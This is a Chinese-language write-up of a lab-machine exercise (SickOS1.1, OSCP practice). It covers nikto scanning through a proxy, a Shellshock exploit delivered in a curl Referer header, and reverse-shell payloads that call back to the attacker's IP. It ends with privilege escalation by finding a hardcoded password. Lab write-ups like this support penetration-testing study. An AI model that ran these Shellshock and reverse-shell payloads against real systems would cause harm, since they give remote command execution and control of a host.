首页 > 其他分享 >OSCP(扩展篇靶机SickOS1.1)

OSCP(扩展篇靶机SickOS1.1)

时间:2023-12-08 15:55:42浏览次数:50  
标签:bin cgi 107.148 192.168 echo SickOS1.1 靶机 bash OSCP

第一步:nmap和nikto

nikto:https://zhuanlan.zhihu.com/p/124246499

 8080 http-proxy

我们是利用3128查看nikto是否存在可利用的漏洞

nikto -h 192.168.107.148 --useproxy 192.168.107.148:3128

扫描目标时,部分目标部署了防护设备,为避免暴露 ip可以使用代理进行扫描,nikto 支持设置代理,参数是 - useproxy。当然,需要配合其他代理工具(比如proxychains)使用

OSVDB-112004: /cgi-bin/status: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271).

 

第二步:利用/cgi-bin/status的shellshock exploit(shellshock)

192.168.107.148:3128

Shellshock,又称Bashdoor,是在Unix中广泛使用的Bash shell中的一个安全漏洞

curl -v --proxy 192.168.107.148:3128 http://192.168.107.148/cgi-bin/status -H "Referer:() {  test;}; echo 'Content-Type: text/plain'; echo; echo; /usr/bin/id;exit"

/cgi-bin/status是目标服务器上的一个CGI脚本路径。 -H "Referer:() { test;}; echo 'Content-Type: text/plain'; echo; echo; /usr/bin/id;exit": 这个选项指定了一个自定义的请求头"Referer"。Shellshock漏洞可以通过构造恶意的Referer头来执行任意命令。在这个例子中,构造的Referer头包含了一段Shellshock的Payload,以执行/usr/bin/id命令并打印当前用户的身份信息。

 

第三步:shellshock反向shell利用

bash:   bash -i >& /dev/tcp/192.168.107.129/8080 0>&1

curl -v --proxy 192.168.107.148:3128 http://192.168.107.148/cgi-bin/status -H "Referer:() {  test;}; echo 'Content-Type: text/plain'; echo; echo; bash -i >& /dev/tcp/192.168.107.129/8080 0>&1"

 这种方式不行,Shellshock,又称Bashdoor,是在Unix中广泛使用的Bash shell中的一个安全漏洞,我们要生成unix的

sudo msfvenom -p cmd/unix/reverse_bash lhost=192.168.107.129 lport=4444 -f raw 

 bash -c '0<&113-;exec 113<>/dev/tcp/192.168.107.129/4444;sh <&113 >&113 2>&113'

将playload改为:

curl -v --proxy 192.168.107.148:3128 http://192.168.107.148/cgi-bin/status -H "Referer:() { test;}; echo 'Content-Type: text/plain'; echo; echo; 0<&113-;exec 113<>/dev/tcp/192.168.107.129/4444;sh <&113 >&113 2>&113"

 显示没有对应的目录,因此要把命令中的sh写为完整路径/bin/bash    

/bin/bash: sh: No such file or directory

将playload改为:

curl -v --proxy 192.168.107.148:3128 http://192.168.107.148/cgi-bin/status -H "Referer:() { test;}; echo 'Content-Type: text/plain'; echo; echo; 0<&113-;exec 113<>/dev/tcp/192.168.107.129/4444;/bin/bash <&113 >&113 2>&113"

 

第四步:获取ttyshell

python -c 'import pty; pty.spawn("/bin/bash")'

cat /etc/passwd

find / -maxdepth 4 -name *.php -type f 2>/dev/null | xargs grep -C 3 -i pass      -----查看硬编码的线索

 得出的john@123其实就是sickos的密码

 sudo -l 发现所有权限都有

 获得旗帜

 

完结撒花~

标签:bin,cgi,107.148,192.168,echo,SickOS1.1,靶机,bash,OSCP
From: https://www.cnblogs.com/justdoIT20680/p/17888329.html

相关文章

  • OSCP(提高篇靶机mrRobot)
    第一步:nmap与dirb   fsocity.dic这个可能是用户或者密码的字典,发现内部存在大量重复数据 catfsocity.dic|sort|uniq>fsocietyuniq 进入登录界面test/test登录 第二步:使用hydra进行用户名密码暴力破解Invalidusername不存在该用户名  F=不存在这......
  • OSCP(基础篇靶机Tr0ll 1)
    第一步:nmap 第二步:发现允许匿名访问(Anonymous/Anonymous)是pcap数据包文件,用tcpdump分析tcpdump用法详解:https://www.jianshu.com/p/1ff7f77e2718 sup3rs3cr3tdirlol访问http://192.168.107.145/sup3rs3cr3tdirlol得到roflmao 下载roflmaocd~/Downloadsfileroflma......
  • OSCP(基础篇靶机Kioptrix Level 3)
    第一步:nmap与dirb第二步:发现 ProudlyPoweredby:LotusCMS框架,尝试是否存在漏洞利用(失败) 漏洞分析与利用:https://www.youtube.com/watch?v=ZsQP94HHfeY该模块利用了LotusCMS3.0的Router()函数中发现的漏洞。这是通过在“page”参数中嵌入PHP代码来完成的,该参数......
  • Vulnhub-DevGuru-1(靶机玩乐2023-12-1_已完成)
    靶机下载地址:https://www.vulnhub.com/entry/devguru-1,620/第一步:NMAPmap-p--sV-sC-A192.168.177.131-oAnmap_devguru 扫描结果显示目标开放了22、80、8585端口  得到backend为OctoberCMS后台登录界面 第二步:.git源码泄露分析git信息泄露分析:https://g......
  • OSCP(提高篇靶机Stapler)
    第一步:netdiscover第二步:nmap   第三步:存在20/21ftp服务,先尝试一下匿名访问,看看有无有用信息(anonymous) 第四步,发现只是闲聊信息,下面看一下12380的web服务,并进行目录扫描,查看泄露目录robots.txtdirbhttps://192.168.107.143:12380  当然这里也可以使用:nikto-h......
  • OSCP(基础篇靶机Kioptrix Level 2)
    第一步:netdiscover加nmap 第二步:通过burpsuite,利用SQLiPayloads进行SQL注入SQLiPayloads:'-''''&''^''*''or''-''or''''or''&''or'&#......
  • OSCP(基础篇靶机Kioptrix Level 1)
    第一步:netdiscover-ieth0 第二步:nmap 第三步:139samba高危服务,先看看是啥版本,利用msfmsfconsoleuseauxiliary/scanner/smb/smb_version 第四步:Samba<2.2.8(Linux/BSD)-RemoteCodeExecution存在远程代码执行漏洞kali查看某个系统的漏洞工具:msfconsole->sear......
  • Vulnhub DomDom-1(靶机玩乐2023-11-30)
    靶机下载地址:https://www.vulnhub.com/entry/domdom-1,328/第一步:扫一下同网段接口IP: 第二步:nmap扫描版本端口详细信息并输出  第三步:访问80端口服务 第四步:简单做做dirb目录遍历,也可以安装gobuster等做目录扫描:https://blog.csdn.net/qq_22597955/article/details......
  • 【Sword系列】Vulnhub靶机Bob_v1.0.1 writeup
    个人博客地址:  http://www.sword-blogs.com/下载地址:https://www.vulnhub.com/entry/bob-101,226/信息搜集扫描IP地址扫描端口及端口信息访问80端口并没有发现有用的信息扫描目录看到有熟悉的robots.txt,访问看一下发现了dev_shell.php,可以执行一些简单的命令,但是不......
  • Metasploitable-Linux靶机配置
    Metasploitable和kali是课上下载好的。直接打开进入欢迎界面用默认账号登录了之后,修改root密码(sudopasswdroot),登录root账号,查看本机IP(ifconfig)切换到kali,把kali的IP改为192.168.72.129,且能ping通192.168.72.131在kali的浏览器中输入靶机的IP,可以看到靶机的界面......